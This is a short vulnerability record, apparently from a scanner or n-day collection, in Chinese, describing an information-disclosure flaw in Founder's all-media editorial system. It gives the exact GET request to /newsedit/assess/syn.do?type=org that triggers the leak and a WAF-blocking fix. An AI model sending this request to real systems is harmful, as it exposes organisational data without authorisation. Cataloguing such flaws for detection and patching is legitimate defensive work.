vendor = "方正"
name = "方正全媒体采编系统存在syn.do信息泄露漏洞"
type = "信息泄露"
version = "未知"
path = "/newsedit/assess/syn.do"
detail = "GET /newsedit/assess/syn.do?type=org HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Content-Length: 185Accept: */* Accept-Encoding: gzip, deflate Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
